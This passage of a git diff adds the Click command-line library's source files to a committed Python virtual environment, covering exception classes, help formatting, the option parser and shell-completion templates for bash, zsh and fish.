versionadded:: 4.0 + """ + + def __init__( + self, + option_name: str, + message: t.Optional[str] = None, + possibilities: t.Optional[t.Sequence[str]] = None, + ctx: t.Optional["Context"] = None, + ) -> None: + if message is None: + message = _("No such option: {name}").format(name=option_name) + + super().__init__(message, ctx) + self.option_name = option_name + self.possibilities = possibilities + + def format_message(self) -> str: + if not self.possibilities: + return self.message + + possibility_str = ", ".join(sorted(self.possibilities)) + suggest = ngettext( + "Did you mean {possibility}?", + "(Possible options: {possibilities})", + len(self.possibilities), + ).format(possibility=possibility_str, possibilities=possibility_str) + return f"{self.message} {suggest}" + + +class BadOptionUsage(UsageError): + """Raised if an option is generally supplied but the use of the option + was incorrect. This is for instance raised if the number of arguments + for an option is not correct. + + .. versionadded:: 4.0 + + :param option_name: the name of the option being used incorrectly. + """ + + def __init__( + self, option_name: str, message: str, ctx: t.Optional["Context"] = None + ) -> None: + super().__init__(message, ctx) + self.option_name = option_name + + +class BadArgumentUsage(UsageError): + """Raised if an argument is generally supplied but the use of the argument + was incorrect. This is for instance raised if the number of values + for an argument is not correct. + + .. versionadded:: 6.0 + """ + + +class FileError(ClickException): + """Raised if a file cannot be opened.""" + + def __init__(self, filename: str, hint: t.Optional[str] = None) -> None: + if hint is None: + hint = _("unknown error") + + super().__init__(hint) + self.ui_filename: str = format_filename(filename) + self.filename = filename + + def format_message(self) -> str: + return _("Could not open file {filename!r}: {message}").format( + filename=self.ui_filename, message=self.message + ) + + +class Abort(RuntimeError): + """An internal signalling exception that signals Click to abort.""" + + +class Exit(RuntimeError): + """An exception that indicates that the application should exit with some + status code. + + :param code: the status code to exit with. + """ + + __slots__ = ("exit_code",) + + def __init__(self, code: int = 0) -> None: + self.exit_code: int = code diff --git a/env/Lib/site-packages/click/formatting.py b/env/Lib/site-packages/click/formatting.py new file mode 100644 index 00000000..ddd2a2f8 --- /dev/null +++ b/env/Lib/site-packages/click/formatting.py @@ -0,0 +1,301 @@ +import typing as t +from contextlib import contextmanager +from gettext import gettext as _ + +from ._compat import term_len +from .parser import split_opt + +# Can force a width. This is used by the test system +FORCED_WIDTH: t.Optional[int] = None + + +def measure_table(rows: t.Iterable[t.Tuple[str, str]]) -> t.Tuple[int, ...]: + widths: t.Dict[int, int] = {} + + for row in rows: + for idx, col in enumerate(row): + widths[idx] = max(widths.get(idx, 0), term_len(col)) + + return tuple(y for x, y in sorted(widths.items())) + + +def iter_rows( + rows: t.Iterable[t.Tuple[str, str]], col_count: int +) -> t.Iterator[t.Tuple[str, ...]]: + for row in rows: + yield row + ("",) * (col_count - len(row)) + + +def wrap_text( + text: str, + width: int = 78, + initial_indent: str = "", + subsequent_indent: str = "", + preserve_paragraphs: bool = False, +) -> str: + """A helper function that intelligently wraps text. 
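A small sketch, under stated assumptions, of how application code typically subclasses ``ClickException`` so that the standalone entry point prints the message and exits with a custom code; ``ConfigError`` is an invented name:

.. code-block:: python

    import click


    class ConfigError(click.ClickException):
        """Illustrative domain error; Click prints 'Error: <message>' via show()."""

        exit_code = 3


    @click.command()
    @click.option("--config", type=click.Path())
    def run(config) -> None:
        if config is None:
            raise ConfigError("no configuration file was given")
        click.echo(f"using {config}")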
By default, it + assumes that it operates on a single paragraph of text but if the + `preserve_paragraphs` parameter is provided it will intelligently + handle paragraphs (defined by two empty lines). + + If paragraphs are handled, a paragraph can be prefixed with an empty + line containing the ``\\b`` character (``\\x08``) to indicate that + no rewrapping should happen in that block. + + :param text: the text that should be rewrapped. + :param width: the maximum width for the text. + :param initial_indent: the initial indent that should be placed on the + first line as a string. + :param subsequent_indent: the indent string that should be placed on + each consecutive line. + :param preserve_paragraphs: if this flag is set then the wrapping will + intelligently handle paragraphs. + """ + from ._textwrap import TextWrapper + + text = text.expandtabs() + wrapper = TextWrapper( + width, + initial_indent=initial_indent, + subsequent_indent=subsequent_indent, + replace_whitespace=False, + ) + if not preserve_paragraphs: + return wrapper.fill(text) + + p: t.List[t.Tuple[int, bool, str]] = [] + buf: t.List[str] = [] + indent = None + + def _flush_par() -> None: + if not buf: + return + if buf[0].strip() == "\b": + p.append((indent or 0, True, "\n".join(buf[1:]))) + else: + p.append((indent or 0, False, " ".join(buf))) + del buf[:] + + for line in text.splitlines(): + if not line: + _flush_par() + indent = None + else: + if indent is None: + orig_len = term_len(line) + line = line.lstrip() + indent = orig_len - term_len(line) + buf.append(line) + _flush_par() + + rv = [] + for indent, raw, text in p: + with wrapper.extra_indent(" " * indent): + if raw: + rv.append(wrapper.indent_only(text)) + else: + rv.append(wrapper.fill(text)) + + return "\n\n".join(rv) + + +class HelpFormatter: + """This class helps with formatting text-based help pages. It's + usually just needed for very special internal cases, but it's also + exposed so that developers can write their own fancy outputs. + + At present, it always writes into memory. + + :param indent_increment: the additional increment for each level. + :param width: the width for the text. This defaults to the terminal + width clamped to a maximum of 78. + """ + + def __init__( + self, + indent_increment: int = 2, + width: t.Optional[int] = None, + max_width: t.Optional[int] = None, + ) -> None: + import shutil + + self.indent_increment = indent_increment + if max_width is None: + max_width = 80 + if width is None: + width = FORCED_WIDTH + if width is None: + width = max(min(shutil.get_terminal_size().columns, max_width) - 2, 50) + self.width = width + self.current_indent = 0 + self.buffer: t.List[str] = [] + + def write(self, string: str) -> None: + """Writes a unicode string into the internal buffer.""" + self.buffer.append(string) + + def indent(self) -> None: + """Increases the indentation.""" + self.current_indent += self.indent_increment + + def dedent(self) -> None: + """Decreases the indentation.""" + self.current_indent -= self.indent_increment + + def write_usage( + self, prog: str, args: str = "", prefix: t.Optional[str] = None + ) -> None: + """Writes a usage line into the buffer. + + :param prog: the program name. + :param args: whitespace separated list of arguments. + :param prefix: The prefix for the first line. Defaults to + ``"Usage: "``. 
+ """ + if prefix is None: + prefix = f"{_('Usage:')} " + + usage_prefix = f"{prefix:>{self.current_indent}}{prog} " + text_width = self.width - self.current_indent + + if text_width >= (term_len(usage_prefix) + 20): + # The arguments will fit to the right of the prefix. + indent = " " * term_len(usage_prefix) + self.write( + wrap_text( + args, + text_width, + initial_indent=usage_prefix, + subsequent_indent=indent, + ) + ) + else: + # The prefix is too long, put the arguments on the next line. + self.write(usage_prefix) + self.write("\n") + indent = " " * (max(self.current_indent, term_len(prefix)) + 4) + self.write( + wrap_text( + args, text_width, initial_indent=indent, subsequent_indent=indent + ) + ) + + self.write("\n") + + def write_heading(self, heading: str) -> None: + """Writes a heading into the buffer.""" + self.write(f"{'':>{self.current_indent}}{heading}:\n") + + def write_paragraph(self) -> None: + """Writes a paragraph into the buffer.""" + if self.buffer: + self.write("\n") + + def write_text(self, text: str) -> None: + """Writes re-indented text into the buffer. This rewraps and + preserves paragraphs. + """ + indent = " " * self.current_indent + self.write( + wrap_text( + text, + self.width, + initial_indent=indent, + subsequent_indent=indent, + preserve_paragraphs=True, + ) + ) + self.write("\n") + + def write_dl( + self, + rows: t.Sequence[t.Tuple[str, str]], + col_max: int = 30, + col_spacing: int = 2, + ) -> None: + """Writes a definition list into the buffer. This is how options + and commands are usually formatted. + + :param rows: a list of two item tuples for the terms and values. + :param col_max: the maximum width of the first column. + :param col_spacing: the number of spaces between the first and + second column. + """ + rows = list(rows) + widths = measure_table(rows) + if len(widths) != 2: + raise TypeError("Expected two columns for definition list") + + first_col = min(widths[0], col_max) + col_spacing + + for first, second in iter_rows(rows, len(widths)): + self.write(f"{'':>{self.current_indent}}{first}") + if not second: + self.write("\n") + continue + if term_len(first) <= first_col - col_spacing: + self.write(" " * (first_col - term_len(first))) + else: + self.write("\n") + self.write(" " * (first_col + self.current_indent)) + + text_width = max(self.width - first_col - 2, 10) + wrapped_text = wrap_text(second, text_width, preserve_paragraphs=True) + lines = wrapped_text.splitlines() + + if lines: + self.write(f"{lines[0]}\n") + + for line in lines[1:]: + self.write(f"{'':>{first_col + self.current_indent}}{line}\n") + else: + self.write("\n") + + @contextmanager + def section(self, name: str) -> t.Iterator[None]: + """Helpful context manager that writes a paragraph, a heading, + and the indents. + + :param name: the section name that is written as heading. 
+ """ + self.write_paragraph() + self.write_heading(name) + self.indent() + try: + yield + finally: + self.dedent() + + @contextmanager + def indentation(self) -> t.Iterator[None]: + """A context manager that increases the indentation.""" + self.indent() + try: + yield + finally: + self.dedent() + + def getvalue(self) -> str: + """Returns the buffer contents.""" + return "".join(self.buffer) + + +def join_options(options: t.Sequence[str]) -> t.Tuple[str, bool]: + """Given a list of option strings this joins them in the most appropriate + way and returns them in the form ``(formatted_string, + any_prefix_is_slash)`` where the second item in the tuple is a flag that + indicates if any of the option prefixes was a slash. + """ + rv = [] + any_prefix_is_slash = False + + for opt in options: + prefix = split_opt(opt)[0] + + if prefix == "/": + any_prefix_is_slash = True + + rv.append((len(prefix), opt)) + + rv.sort(key=lambda x: x[0]) + return ", ".join(x[1] for x in rv), any_prefix_is_slash diff --git a/env/Lib/site-packages/click/globals.py b/env/Lib/site-packages/click/globals.py new file mode 100644 index 00000000..480058f1 --- /dev/null +++ b/env/Lib/site-packages/click/globals.py @@ -0,0 +1,68 @@ +import typing as t +from threading import local + +if t.TYPE_CHECKING: + import typing_extensions as te + from .core import Context + +_local = local() + + +@t.overload +def get_current_context(silent: "te.Literal[False]" = False) -> "Context": + ... + + +@t.overload +def get_current_context(silent: bool = ...) -> t.Optional["Context"]: + ... + + +def get_current_context(silent: bool = False) -> t.Optional["Context"]: + """Returns the current click context. This can be used as a way to + access the current context object from anywhere. This is a more implicit + alternative to the :func:`pass_context` decorator. This function is + primarily useful for helpers such as :func:`echo` which might be + interested in changing its behavior based on the current context. + + To push the current context, :meth:`Context.scope` can be used. + + .. versionadded:: 5.0 + + :param silent: if set to `True` the return value is `None` if no context + is available. The default behavior is to raise a + :exc:`RuntimeError`. + """ + try: + return t.cast("Context", _local.stack[-1]) + except (AttributeError, IndexError) as e: + if not silent: + raise RuntimeError("There is no active click context.") from e + + return None + + +def push_context(ctx: "Context") -> None: + """Pushes a new context to the current stack.""" + _local.__dict__.setdefault("stack", []).append(ctx) + + +def pop_context() -> None: + """Removes the top level from the stack.""" + _local.stack.pop() + + +def resolve_color_default(color: t.Optional[bool] = None) -> t.Optional[bool]: + """Internal helper to get the default value of the color flag. If a + value is passed it's returned unchanged, otherwise it's looked up from + the current context. 
+ """ + if color is not None: + return color + + ctx = get_current_context(silent=True) + + if ctx is not None: + return ctx.color + + return None diff --git a/env/Lib/site-packages/click/parser.py b/env/Lib/site-packages/click/parser.py new file mode 100644 index 00000000..5fa7adfa --- /dev/null +++ b/env/Lib/site-packages/click/parser.py @@ -0,0 +1,529 @@ +""" +This module started out as largely a copy paste from the stdlib's +optparse module with the features removed that we do not need from +optparse because we implement them in Click on a higher level (for +instance type handling, help formatting and a lot more). + +The plan is to remove more and more from here over time. + +The reason this is a different module and not optparse from the stdlib +is that there are differences in 2.x and 3.x about the error messages +generated and optparse in the stdlib uses gettext for no good reason +and might cause us issues. + +Click uses parts of optparse written by Gregory P. Ward and maintained +by the Python Software Foundation. This is limited to code in parser.py. + +Copyright 2001-2006 Gregory P. Ward. All rights reserved. +Copyright 2002-2006 Python Software Foundation. All rights reserved. +""" +# This code uses parts of optparse written by Gregory P. Ward and +# maintained by the Python Software Foundation. +# Copyright 2001-2006 Gregory P. Ward +# Copyright 2002-2006 Python Software Foundation +import typing as t +from collections import deque +from gettext import gettext as _ +from gettext import ngettext + +from .exceptions import BadArgumentUsage +from .exceptions import BadOptionUsage +from .exceptions import NoSuchOption +from .exceptions import UsageError + +if t.TYPE_CHECKING: + import typing_extensions as te + from .core import Argument as CoreArgument + from .core import Context + from .core import Option as CoreOption + from .core import Parameter as CoreParameter + +V = t.TypeVar("V") + +# Sentinel value that indicates an option was passed as a flag without a +# value but is not a flag option. Option.consume_value uses this to +# prompt or use the flag_value. +_flag_needs_value = object() + + +def _unpack_args( + args: t.Sequence[str], nargs_spec: t.Sequence[int] +) -> t.Tuple[t.Sequence[t.Union[str, t.Sequence[t.Optional[str]], None]], t.List[str]]: + """Given an iterable of arguments and an iterable of nargs specifications, + it returns a tuple with all the unpacked arguments at the first index + and all remaining arguments as the second. + + The nargs specification is the number of arguments that should be consumed + or `-1` to indicate that this position should eat up all the remainders. + + Missing items are filled with `None`. + """ + args = deque(args) + nargs_spec = deque(nargs_spec) + rv: t.List[t.Union[str, t.Tuple[t.Optional[str], ...], None]] = [] + spos: t.Optional[int] = None + + def _fetch(c: "te.Deque[V]") -> t.Optional[V]: + try: + if spos is None: + return c.popleft() + else: + return c.pop() + except IndexError: + return None + + while nargs_spec: + nargs = _fetch(nargs_spec) + + if nargs is None: + continue + + if nargs == 1: + rv.append(_fetch(args)) + elif nargs > 1: + x = [_fetch(args) for _ in range(nargs)] + + # If we're reversed, we're pulling in the arguments in reverse, + # so we need to turn them around. + if spos is not None: + x.reverse() + + rv.append(tuple(x)) + elif nargs < 0: + if spos is not None: + raise TypeError("Cannot have two nargs < 0") + + spos = len(rv) + rv.append(None) + + # spos is the position of the wildcard (star). 
If it's not `None`, + # we fill it with the remainder. + if spos is not None: + rv[spos] = tuple(args) + args = [] + rv[spos + 1 :] = reversed(rv[spos + 1 :]) + + return tuple(rv), list(args) + + +def split_opt(opt: str) -> t.Tuple[str, str]: + first = opt[:1] + if first.isalnum(): + return "", opt + if opt[1:2] == first: + return opt[:2], opt[2:] + return first, opt[1:] + + +def normalize_opt(opt: str, ctx: t.Optional["Context"]) -> str: + if ctx is None or ctx.token_normalize_func is None: + return opt + prefix, opt = split_opt(opt) + return f"{prefix}{ctx.token_normalize_func(opt)}" + + +def split_arg_string(string: str) -> t.List[str]: + """Split an argument string as with :func:`shlex.split`, but don't + fail if the string is incomplete. Ignores a missing closing quote or + incomplete escape sequence and uses the partial token as-is. + + .. code-block:: python + + split_arg_string("example 'my file") + ["example", "my file"] + + split_arg_string("example my\\") + ["example", "my"] + + :param string: String to split. + """ + import shlex + + lex = shlex.shlex(string, posix=True) + lex.whitespace_split = True + lex.commenters = "" + out = [] + + try: + for token in lex: + out.append(token) + except ValueError: + # Raised when end-of-string is reached in an invalid state. Use + # the partial token as-is. The quote or escape character is in + # lex.state, not lex.token. + out.append(lex.token) + + return out + + +class Option: + def __init__( + self, + obj: "CoreOption", + opts: t.Sequence[str], + dest: t.Optional[str], + action: t.Optional[str] = None, + nargs: int = 1, + const: t.Optional[t.Any] = None, + ): + self._short_opts = [] + self._long_opts = [] + self.prefixes: t.Set[str] = set() + + for opt in opts: + prefix, value = split_opt(opt) + if not prefix: + raise ValueError(f"Invalid start character for option ({opt})") + self.prefixes.add(prefix[0]) + if len(prefix) == 1 and len(value) == 1: + self._short_opts.append(opt) + else: + self._long_opts.append(opt) + self.prefixes.add(prefix) + + if action is None: + action = "store" + + self.dest = dest + self.action = action + self.nargs = nargs + self.const = const + self.obj = obj + + @property + def takes_value(self) -> bool: + return self.action in ("store", "append") + + def process(self, value: t.Any, state: "ParsingState") -> None: + if self.action == "store": + state.opts[self.dest] = value # type: ignore + elif self.action == "store_const": + state.opts[self.dest] = self.const # type: ignore + elif self.action == "append": + state.opts.setdefault(self.dest, []).append(value) # type: ignore + elif self.action == "append_const": + state.opts.setdefault(self.dest, []).append(self.const) # type: ignore + elif self.action == "count": + state.opts[self.dest] = state.opts.get(self.dest, 0) + 1 # type: ignore + else: + raise ValueError(f"unknown action '{self.action}'") + state.order.append(self.obj) + + +class Argument: + def __init__(self, obj: "CoreArgument", dest: t.Optional[str], nargs: int = 1): + self.dest = dest + self.nargs = nargs + self.obj = obj + + def process( + self, + value: t.Union[t.Optional[str], t.Sequence[t.Optional[str]]], + state: "ParsingState", + ) -> None: + if self.nargs > 1: + assert value is not None + holes = sum(1 for x in value if x is None) + if holes == len(value): + value = None + elif holes != 0: + raise BadArgumentUsage( + _("Argument {name!r} takes {nargs} values.").format( + name=self.dest, nargs=self.nargs + ) + ) + + if self.nargs == -1 and self.obj.envvar is not None and value == (): + # 
Replace empty tuple with None so that a value from the + # environment may be tried. + value = None + + state.opts[self.dest] = value # type: ignore + state.order.append(self.obj) + + +class ParsingState: + def __init__(self, rargs: t.List[str]) -> None: + self.opts: t.Dict[str, t.Any] = {} + self.largs: t.List[str] = [] + self.rargs = rargs + self.order: t.List["CoreParameter"] = [] + + +class OptionParser: + """The option parser is an internal class that is ultimately used to + parse options and arguments. It's modelled after optparse and brings + a similar but vastly simplified API. It should generally not be used + directly as the high level Click classes wrap it for you. + + It's not nearly as extensible as optparse or argparse as it does not + implement features that are implemented on a higher level (such as + types or defaults). + + :param ctx: optionally the :class:`~click.Context` where this parser + should go with. + """ + + def __init__(self, ctx: t.Optional["Context"] = None) -> None: + #: The :class:`~click.Context` for this parser. This might be + #: `None` for some advanced use cases. + self.ctx = ctx + #: This controls how the parser deals with interspersed arguments. + #: If this is set to `False`, the parser will stop on the first + #: non-option. Click uses this to implement nested subcommands + #: safely. + self.allow_interspersed_args: bool = True + #: This tells the parser how to deal with unknown options. By + #: default it will error out (which is sensible), but there is a + #: second mode where it will ignore it and continue processing + #: after shifting all the unknown options into the resulting args. + self.ignore_unknown_options: bool = False + + if ctx is not None: + self.allow_interspersed_args = ctx.allow_interspersed_args + self.ignore_unknown_options = ctx.ignore_unknown_options + + self._short_opt: t.Dict[str, Option] = {} + self._long_opt: t.Dict[str, Option] = {} + self._opt_prefixes = {"-", "--"} + self._args: t.List[Argument] = [] + + def add_option( + self, + obj: "CoreOption", + opts: t.Sequence[str], + dest: t.Optional[str], + action: t.Optional[str] = None, + nargs: int = 1, + const: t.Optional[t.Any] = None, + ) -> None: + """Adds a new option named `dest` to the parser. The destination + is not inferred (unlike with optparse) and needs to be explicitly + provided. Action can be any of ``store``, ``store_const``, + ``append``, ``append_const`` or ``count``. + + The `obj` can be used to identify the option in the order list + that is returned from the parser. + """ + opts = [normalize_opt(opt, self.ctx) for opt in opts] + option = Option(obj, opts, dest, action=action, nargs=nargs, const=const) + self._opt_prefixes.update(option.prefixes) + for opt in option._short_opts: + self._short_opt[opt] = option + for opt in option._long_opts: + self._long_opt[opt] = option + + def add_argument( + self, obj: "CoreArgument", dest: t.Optional[str], nargs: int = 1 + ) -> None: + """Adds a positional argument named `dest` to the parser. + + The `obj` can be used to identify the option in the order list + that is returned from the parser. + """ + self._args.append(Argument(obj, dest=dest, nargs=nargs)) + + def parse_args( + self, args: t.List[str] + ) -> t.Tuple[t.Dict[str, t.Any], t.List[str], t.List["CoreParameter"]]: + """Parses positional arguments and returns ``(values, args, order)`` + for the parsed options and arguments as well as the leftover + arguments if there are any. The order is a list of objects as they + appear on the command line. 
If arguments appear multiple times they + will be memorized multiple times as well. + """ + state = ParsingState(args) + try: + self._process_args_for_options(state) + self._process_args_for_args(state) + except UsageError: + if self.ctx is None or not self.ctx.resilient_parsing: + raise + return state.opts, state.largs, state.order + + def _process_args_for_args(self, state: ParsingState) -> None: + pargs, args = _unpack_args( + state.largs + state.rargs, [x.nargs for x in self._args] + ) + + for idx, arg in enumerate(self._args): + arg.process(pargs[idx], state) + + state.largs = args + state.rargs = [] + + def _process_args_for_options(self, state: ParsingState) -> None: + while state.rargs: + arg = state.rargs.pop(0) + arglen = len(arg) + # Double dashes always handled explicitly regardless of what + # prefixes are valid. + if arg == "--": + return + elif arg[:1] in self._opt_prefixes and arglen > 1: + self._process_opts(arg, state) + elif self.allow_interspersed_args: + state.largs.append(arg) + else: + state.rargs.insert(0, arg) + return + + # Say this is the original argument list: + # [arg0, arg1, ..., arg(i-1), arg(i), arg(i+1), ..., arg(N-1)] + # ^ + # (we are about to process arg(i)). + # + # Then rargs is [arg(i), ..., arg(N-1)] and largs is a *subset* of + # [arg0, ..., arg(i-1)] (any options and their arguments will have + # been removed from largs). + # + # The while loop will usually consume 1 or more arguments per pass. + # If it consumes 1 (eg. arg is an option that takes no arguments), + # then after _process_arg() is done the situation is: + # + # largs = subset of [arg0, ..., arg(i)] + # rargs = [arg(i+1), ..., arg(N-1)] + # + # If allow_interspersed_args is false, largs will always be + # *empty* -- still a subset of [arg0, ..., arg(i-1)], but + # not a very interesting subset! + + def _match_long_opt( + self, opt: str, explicit_value: t.Optional[str], state: ParsingState + ) -> None: + if opt not in self._long_opt: + from difflib import get_close_matches + + possibilities = get_close_matches(opt, self._long_opt) + raise NoSuchOption(opt, possibilities=possibilities, ctx=self.ctx) + + option = self._long_opt[opt] + if option.takes_value: + # At this point it's safe to modify rargs by injecting the + # explicit value, because no exception is raised in this + # branch. This means that the inserted value will be fully + # consumed. + if explicit_value is not None: + state.rargs.insert(0, explicit_value) + + value = self._get_value_from_state(opt, option, state) + + elif explicit_value is not None: + raise BadOptionUsage( + opt, _("Option {name!r} does not take a value.").format(name=opt) + ) + + else: + value = None + + option.process(value, state) + + def _match_short_opt(self, arg: str, state: ParsingState) -> None: + stop = False + i = 1 + prefix = arg[0] + unknown_options = [] + + for ch in arg[1:]: + opt = normalize_opt(f"{prefix}{ch}", self.ctx) + option = self._short_opt.get(opt) + i += 1 + + if not option: + if self.ignore_unknown_options: + unknown_options.append(ch) + continue + raise NoSuchOption(opt, ctx=self.ctx) + if option.takes_value: + # Any characters left in arg? Pretend they're the + # next arg, and stop consuming characters of arg. 
+ if i < len(arg): + state.rargs.insert(0, arg[i:]) + stop = True + + value = self._get_value_from_state(opt, option, state) + + else: + value = None + + option.process(value, state) + + if stop: + break + + # If we got any unknown options we recombine the string of the + # remaining options and re-attach the prefix, then report that + # to the state as new larg. This way there is basic combinatorics + # that can be achieved while still ignoring unknown arguments. + if self.ignore_unknown_options and unknown_options: + state.largs.append(f"{prefix}{''.join(unknown_options)}") + + def _get_value_from_state( + self, option_name: str, option: Option, state: ParsingState + ) -> t.Any: + nargs = option.nargs + + if len(state.rargs) < nargs: + if option.obj._flag_needs_value: + # Option allows omitting the value. + value = _flag_needs_value + else: + raise BadOptionUsage( + option_name, + ngettext( + "Option {name!r} requires an argument.", + "Option {name!r} requires {nargs} arguments.", + nargs, + ).format(name=option_name, nargs=nargs), + ) + elif nargs == 1: + next_rarg = state.rargs[0] + + if ( + option.obj._flag_needs_value + and isinstance(next_rarg, str) + and next_rarg[:1] in self._opt_prefixes + and len(next_rarg) > 1 + ): + # The next arg looks like the start of an option, don't + # use it as the value if omitting the value is allowed. + value = _flag_needs_value + else: + value = state.rargs.pop(0) + else: + value = tuple(state.rargs[:nargs]) + del state.rargs[:nargs] + + return value + + def _process_opts(self, arg: str, state: ParsingState) -> None: + explicit_value = None + # Long option handling happens in two parts. The first part is + # supporting explicitly attached values. In any case, we will try + # to long match the option first. + if "=" in arg: + long_opt, explicit_value = arg.split("=", 1) + else: + long_opt = arg + norm_long_opt = normalize_opt(long_opt, self.ctx) + + # At this point we will match the (assumed) long option through + # the long option matching code. Note that this allows options + # like "-foo" to be matched as long options. + try: + self._match_long_opt(norm_long_opt, explicit_value, state) + except NoSuchOption: + # At this point the long option matching failed, and we need + # to try with short options. However there is a special rule + # which says, that if we have a two character options prefix + # (applies to "--foo" for instance), we do not dispatch to the + # short option code and will instead raise the no option + # error. 
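For orientation only (``OptionParser`` is internal and normally driven by the high-level classes), the parsing flow above can be exercised directly; the ``_Stub`` object stands in for the ``click.Option`` the parser usually receives and is an assumption of this sketch:

.. code-block:: python

    from click.parser import OptionParser


    class _Stub:
        # Stand-in for the click.Option normally passed as `obj`; only the
        # attribute consulted by _get_value_from_state is needed here.
        _flag_needs_value = False


    parser = OptionParser()
    parser.add_option(_Stub(), ["--name"], dest="name", action="store")
    parser.add_option(_Stub(), ["-v"], dest="verbose", action="count")

    opts, largs, order = parser.parse_args(["--name=Click", "-vv", "extra"])
    print(opts)   # {'name': 'Click', 'verbose': 2}
    print(largs)  # ['extra'] -- leftover positional; no Argument was registered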
+ if arg[:2] not in self._opt_prefixes: + self._match_short_opt(arg, state) + return + + if not self.ignore_unknown_options: + raise + + state.largs.append(arg) diff --git a/env/Lib/site-packages/click/py.typed b/env/Lib/site-packages/click/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/click/shell_completion.py b/env/Lib/site-packages/click/shell_completion.py new file mode 100644 index 00000000..dc9e00b9 --- /dev/null +++ b/env/Lib/site-packages/click/shell_completion.py @@ -0,0 +1,596 @@ +import os +import re +import typing as t +from gettext import gettext as _ + +from .core import Argument +from .core import BaseCommand +from .core import Context +from .core import MultiCommand +from .core import Option +from .core import Parameter +from .core import ParameterSource +from .parser import split_arg_string +from .utils import echo + + +def shell_complete( + cli: BaseCommand, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + complete_var: str, + instruction: str, +) -> int: + """Perform shell completion for the given CLI program. + + :param cli: Command being called. + :param ctx_args: Extra arguments to pass to + ``cli.make_context``. + :param prog_name: Name of the executable in the shell. + :param complete_var: Name of the environment variable that holds + the completion instruction. + :param instruction: Value of ``complete_var`` with the completion + instruction and shell, in the form ``instruction_shell``. + :return: Status code to exit with. + """ + shell, _, instruction = instruction.partition("_") + comp_cls = get_completion_class(shell) + + if comp_cls is None: + return 1 + + comp = comp_cls(cli, ctx_args, prog_name, complete_var) + + if instruction == "source": + echo(comp.source()) + return 0 + + if instruction == "complete": + echo(comp.complete()) + return 0 + + return 1 + + +class CompletionItem: + """Represents a completion value and metadata about the value. The + default metadata is ``type`` to indicate special shell handling, + and ``help`` if a shell supports showing a help string next to the + value. + + Arbitrary parameters can be passed when creating the object, and + accessed using ``item.attr``. If an attribute wasn't passed, + accessing it returns ``None``. + + :param value: The completion suggestion. + :param type: Tells the shell script to provide special completion + support for the type. Click uses ``"dir"`` and ``"file"``. + :param help: String shown next to the value if supported. + :param kwargs: Arbitrary metadata. The built-in implementations + don't use this, but custom type completions paired with custom + shell support could use it. + """ + + __slots__ = ("value", "type", "help", "_info") + + def __init__( + self, + value: t.Any, + type: str = "plain", + help: t.Optional[str] = None, + **kwargs: t.Any, + ) -> None: + self.value: t.Any = value + self.type: str = type + self.help: t.Optional[str] = help + self._info = kwargs + + def __getattr__(self, name: str) -> t.Any: + return self._info.get(name) + + +# Only Bash >= 4.4 has the nosort option. 
+_SOURCE_BASH = """\ +%(complete_func)s() { + local IFS=$'\\n' + local response + + response=$(env COMP_WORDS="${COMP_WORDS[*]}" COMP_CWORD=$COMP_CWORD \ +%(complete_var)s=bash_complete $1) + + for completion in $response; do + IFS=',' read type value <<< "$completion" + + if [[ $type == 'dir' ]]; then + COMPREPLY=() + compopt -o dirnames + elif [[ $type == 'file' ]]; then + COMPREPLY=() + compopt -o default + elif [[ $type == 'plain' ]]; then + COMPREPLY+=($value) + fi + done + + return 0 +} + +%(complete_func)s_setup() { + complete -o nosort -F %(complete_func)s %(prog_name)s +} + +%(complete_func)s_setup; +""" + +_SOURCE_ZSH = """\ +#compdef %(prog_name)s + +%(complete_func)s() { + local -a completions + local -a completions_with_descriptions + local -a response + (( ! $+commands[%(prog_name)s] )) && return 1 + + response=("${(@f)$(env COMP_WORDS="${words[*]}" COMP_CWORD=$((CURRENT-1)) \ +%(complete_var)s=zsh_complete %(prog_name)s)}") + + for type key descr in ${response}; do + if [[ "$type" == "plain" ]]; then + if [[ "$descr" == "_" ]]; then + completions+=("$key") + else + completions_with_descriptions+=("$key":"$descr") + fi + elif [[ "$type" == "dir" ]]; then + _path_files -/ + elif [[ "$type" == "file" ]]; then + _path_files -f + fi + done + + if [ -n "$completions_with_descriptions" ]; then + _describe -V unsorted completions_with_descriptions -U + fi + + if [ -n "$completions" ]; then + compadd -U -V unsorted -a completions + fi +} + +if [[ $zsh_eval_context[-1] == loadautofunc ]]; then + # autoload from fpath, call function directly + %(complete_func)s "$@" +else + # eval/source/. command, register function for later + compdef %(complete_func)s %(prog_name)s +fi +""" + +_SOURCE_FISH = """\ +function %(complete_func)s; + set -l response (env %(complete_var)s=fish_complete COMP_WORDS=(commandline -cp) \ +COMP_CWORD=(commandline -t) %(prog_name)s); + + for completion in $response; + set -l metadata (string split "," $completion); + + if test $metadata[1] = "dir"; + __fish_complete_directories $metadata[2]; + else if test $metadata[1] = "file"; + __fish_complete_path $metadata[2]; + else if test $metadata[1] = "plain"; + echo $metadata[2]; + end; + end; +end; + +complete --no-files --command %(prog_name)s --arguments \ +"(%(complete_func)s)"; +""" + + +class ShellComplete: + """Base class for providing shell completion support. A subclass for + a given shell will override attributes and methods to implement the + completion instructions (``source`` and ``complete``). + + :param cli: Command being called. + :param prog_name: Name of the executable in the shell. + :param complete_var: Name of the environment variable that holds + the completion instruction. + + .. versionadded:: 8.0 + """ + + name: t.ClassVar[str] + """Name to register the shell as with :func:`add_completion_class`. + This is used in completion instructions (``{name}_source`` and + ``{name}_complete``). + """ + + source_template: t.ClassVar[str] + """Completion script template formatted by :meth:`source`. This must + be provided by subclasses. + """ + + def __init__( + self, + cli: BaseCommand, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + complete_var: str, + ) -> None: + self.cli = cli + self.ctx_args = ctx_args + self.prog_name = prog_name + self.complete_var = complete_var + + @property + def func_name(self) -> str: + """The name of the shell function defined by the completion + script. 
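A brief, hedged sketch of the completion path these classes serve: a parameter can expose a ``shell_complete`` callback that returns ``CompletionItem`` objects (the environment names below are invented):

.. code-block:: python

    import click
    from click.shell_completion import CompletionItem


    def complete_env(ctx: click.Context, param: click.Parameter, incomplete: str):
        # Each item may carry help text; shells such as zsh and fish can display it.
        targets = {"dev": "local sandbox", "staging": "pre-production", "prod": "production"}
        return [
            CompletionItem(name, help=description)
            for name, description in targets.items()
            if name.startswith(incomplete)
        ]


    @click.command()
    @click.option("--env", shell_complete=complete_env)
    def deploy(env: str) -> None:
        click.echo(f"deploying to {env}")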
